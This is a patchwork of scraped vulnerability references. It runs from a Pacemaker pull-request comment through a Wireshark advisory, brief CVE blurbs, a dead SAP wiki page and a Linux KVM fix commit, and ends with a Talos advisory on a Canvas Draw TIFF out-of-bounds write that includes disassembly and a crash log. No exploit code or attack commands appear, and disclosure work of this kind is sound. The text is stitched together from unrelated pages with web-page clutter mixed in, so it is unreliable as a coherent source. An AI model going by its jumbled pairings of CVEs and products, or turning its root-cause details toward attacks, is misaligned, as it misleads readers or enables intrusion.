    same now, hence there's still a bit of truth about "more likely  
    triggerable", though CVE-2018-1687 should have been mentioned instead,  
    mea culpa, again, not enough time for fact checking)

and pacemaker-controld just comes to life

(very contrieved scenario:

*   corosync up, pacemakerd has just spawned pacemaker-controld
*   at this point, corosync crashes
*   the above somehow (possibly with the involvement of the supervisor  
    above pacemakerd since the prerequisite, corosync, ceased to run,,  
    or it could be CPG API both of these use that could trigger something  
    unexpected on corosync's death) causes both pacemakerd and  
    pacemaker-based disappear, while pacemaker-controld continues to  
    run (wasn't connected to CPG yet)
*   pacemaker-controld would attempt to connect to corosync, and after  
    a while falls on its nose for the lack of guard the commit just added  
    \[though it now seems -- also? -- as shenanigans in the FSM transitions  
    once 30 attempts to connect to CIB fall short -- it's all very messy  
    and undocumented in actual words what the controlled failure  
    modes are with intended behaviours and recovery, sadly sadly sadly\])

More realistic scenario is that the admin decided for some reason to  
run /usr/lib/exec/pacemaker-controld in isolation without corosync  
(and pacemaker-based) running (perhaps to test pacemakerd's ability  
to adopt pre-existing processes but simply getting the timing wrong).

All in all, that commit is also a very desirable, even if it rather  
fixes a long-standing flaw, good that my colleague Martin Juříček  
conducting some tests discovered that (thanks).

Copy link

Contributor Author

****jnpkrn** commented May 28, 2019**

CVE-2018-16878: High: cumulative patchset to fix CVE-2019-3885, CVE-2018-16877, CVE-2018-16878 + additional unmasked null pointer deref by jnpkrn · Pull Request #1749 · ClusterLabs/pacemaker

In Wireshark 2.4.0 to 2.4.13, 2.6.0 to 2.6.7, and 3.0.0, the GSS-API dissector could crash. This was addressed in epan/dissectors/packet-gssapi.c by ensuring that a valid dissector is called.

**Summary**

**Name:** GSS-API dissector crash

**Docid:** wnpa-sec-2019-14

**Date:** April 8, 2019

**Affected versions:** 3.0.0, 2.6.0 to 2.6.7, 2.4.0 to 2.4.13

**Fixed versions:** 3.0.1, 2.6.8, 2.4.14

**References:**

Wireshark issue 15613.  
CVE-2019-10894.

**Details****Description**

The GSS-API dissector could crash. Discovered by Mateusz Jurczyk.

**Impact**

It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 3.0.1, 2.6.8, 2.4.14 or later.

CVE-2019-10894: Wireshark • wnpa-sec-2019-14 GSS-API dissector crash

In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.

CVE-2019-10692: WP Google Maps

Customizing functionality of SAP NetWeaver AS ABAP Platform (fixed in versions from 7.0 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.53, from 7.74 to 7.75) does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges.

Wiki Communication

*   Pages

**Page tree**

Browse pages

*   

1.  Pages

Skip to end of banner

*   
*   Jira links

Go to start of banner

Skip to end of metadata

*   Created by Aryhe Segal, last modified on Jun 21, 2022

Go to start of metadata

**_Sorry. The page you are looking for is not available._****Please try the links below**

**SAP Community**

view SAP Community

**SAP Support**

help SAP Support

**SAP Business By Design**

edit Business By Design

**If all else fails, contact the Support Team at PSWIKI@sap.com**

*   No labels

Overview

Content Tools

*   Powered by Atlassian Confluence 7.13.8
*   Printed by Atlassian Confluence 7.13.8
*   Report a bug
*   Atlassian News

Atlassian

*   Privacy
*   Terms of Use
*   Legal Disclosure
*   Copyright
*   Trademark

CVE-2019-0257: Community Wiki Sunset - Wiki Communication

In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free.

Permalink

Browse files

Browse the repository at this point in the history

kvm: fix kvm\_ioctl\_create\_device() reference counting (CVE-2019-6974)

kvm\_ioctl\_create\_device() does the following:

1. creates a device that holds a reference to the VM object (with a borrowed
   reference, the VM's refcount has not been bumped yet)
2. initializes the device
3. transfers the reference to the device to the caller's file descriptor table
4. calls kvm\_get\_kvm() to turn the borrowed reference to the VM into a real
   reference

The ownership transfer in step 3 must not happen before the reference to the VM
becomes a proper, non-borrowed reference, which only happens in step 4.
After step 3, an attacker can close the file descriptor and drop the borrowed
reference, which can cause the refcount of the kvm object to drop to zero.

This means that we need to grab a reference for the device before
anon\_inode\_getfd(), otherwise the VM can disappear from under us.

Fixes: 852b6d5 ("kvm: add device control API")
Cc: stable@kernel.org
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>

*   Loading branch information

CVE-2019-6974: kvm: fix kvm_ioctl_create_device() reference counting (CVE-2019-6974) · torvalds/linux@cfa3938

An exploitable out-of-bounds write exists in the TIFF-parsing functionality of Canvas Draw version 5.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution.

**Summary**

An exploitable out-of-bounds write exists in the TIFF-parsing functionality of Canvas Draw version 5.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution.

**Tested Versions**

ACDSystems Canvas Draw 5.0.0

**Product URLs**

https://www.canvasgfx.com/en/products/canvas-draw

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-787: Out-of-Bounds Write

**Details**

Canvas Draw 5 is a graphics-editing tool used to create and edit images, as well as other graphic design functions. This product has a sizable user base and is popular in the graphic design field. The vulnerable component is in the handling of TIFF images. TIFF is a raster-based image format used in graphics-editing projects, thus making it a very common file format for such an application.

The vulnerability arises in the parsing of a tiled TIFF image with the Adobe Deflate compression scheme. This compression algorithm is not part of the TIFF standard algorithm, but was added as an extension from Adobe and uses a lossless Deflate compression scheme utilizing the zlib compressed data format. The Canvas Draw application supports this compression format and is able to handle files using it. The vulnerability arises in attempting to build a Huffman table. Huffman coding is one of the two things that make up the deflate encoding scheme.

When using the deflate encoding scheme the application takes user data directly from the TIFF image without validation. The initial crash is shown below.

    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7ffeefc00eac)
    frame #0: 0x0000000102001245 ImageGear18`_DFL_huff_table_build + 364
    ImageGear18`_DFL_huff_table_build:
        0x102001245 <+364>: movzx  edx, word ptr [rbp + 2*rcx - 0x100]   [0]
        0x10200124d <+372>: lea    esi, [rdx + 0x1]                      [1]
        0x102001250 <+375>: mov    word ptr [rbp + 2*rcx - 0x100], si    [2]
        0x102001258 <+383>: mov    word ptr [r12], dx
    

The value inside of RCX at \[0\] is controlled via the compressed data inside the TIFF image. It then uses the value given and loads it into ESI, \[1\]. The value is then used again at \[2\], where a user-controlled value is written, too. This leads to an exploitable out-of-bounds write condition. An attacker could gain code execution through this vulnerability by using specially crafted data.

**Crash Information**

    Crashed thread log = 
    : Dispatch queue: com.apple.main-thread
    0   ImageGear18                     0x000000010cd9a245 _DFL_huff_table_build + 364
    1   ImageGear18                     0x000000010cd9a8af _DFL_dynamic_huffman_get + 1437
    2   ImageGear18                     0x000000010cd9aaa6 DFL_uncompress + 281
    3   ImageGear18                     0x000000010cf0ac1d _TIF_read + 3642
    4   ImageGear18                     0x000000010cf09d85 TIF_read + 261
    5   ImageGear18                     0x000000010ce06dfd GPb_fltrm_READ_call_param + 178
    6   ImageGear18                     0x000000010ce06d45 GPb_fltrm_READ_call + 21
    7   ImageGear18                     0x000000010cdddbbf iIG_load_FD_CB_ex + 411
    8   ImageGear18                     0x000000010cf4f3b6 IG_load_FD_CB_ex + 91
    9   com.acdsystem.canvastool.ImageIO    0x00000001766eeba1 CIGReadFile_CB_ext::readFile() + 651
    10  com.acdsystem.canvastool.ImageIO    0x000000017671bc1b ImageGearAcquireProc(short, AcquireRecord*, int*, short*) + 915
    11  com.acdsystem.canvastool.ImageIO    0x000000017671c104 ImageIORunAcquireProc(_ImageIOAcquireState*) + 744
    12  com.acdsystem.canvastool.ImageIO    0x000000017671997b 0x17669a000 + 522619
    13  com.acdsystem.canvastool.ImageIO    0x000000017671b49d DoImportFile(ImportFileMsg*) + 1121
    14  com.acdsystem.canvastool.ImageIO    0x00000001766ceab3 toolmain() + 970
    15  com.acdsystem.canvastool.ImageIO    0x00000001766fa8d7 stdtool(TToolCallBlock*) + 119
    16  com.acdsystem.canvastool.ImageIO    0x00000001766fa859 cvtool_main(TToolCallBlock*) + 9
    17  com.canvasgfx.Canvas-Draw5      0x000000010af84138 0x10ae1b000 + 1478968
    18  com.canvasgfx.Canvas-Draw5      0x000000010bb1ff9a 0x10ae1b000 + 13651866
    19  com.canvasgfx.Canvas-Draw5      0x000000010bb1f748 0x10ae1b000 + 13649736
    20  com.canvasgfx.Canvas-Draw5      0x000000010bc9e18d 0x10ae1b000 + 15217037
    21  com.apple.AppKit                0x00007fff36306214 -[NSApplication _doOpenFile:ok:tryTemp:] + 376
    22  com.apple.AppKit                0x00007fff35ee5337 -[NSApplication finishLaunching] + 2438
    23  com.apple.AppKit                0x00007fff35ee4683 -[NSApplication run] + 250
    24  com.apple.AppKit                0x00007fff35eb3a72 NSApplicationMain + 804
    25  libdyld.dylib                   0x00007fff60761015 start + 1
    
    log name is: ./crashlogs/1.crashlog.txt
    ---
    exception=EXC_BAD_ACCESS:signal=11:is_exploitable= yes:instruction_disassembly=movzwl    %si,CONSTANT(%rbp,%rcx,2),:instruction_address=0x000000010cd9a245:access_type=write:access_address=0x00007ffee4dea15c:
    Crash accessing invalid address.
    

**Timeline**

2018-08-06 - Vendor Disclosure  
2019-01-18 - Vendor Patched  
2019-01-30 - Public Release

Discovered by Tyler Bohan of Cisco Talos.

Tag

#sap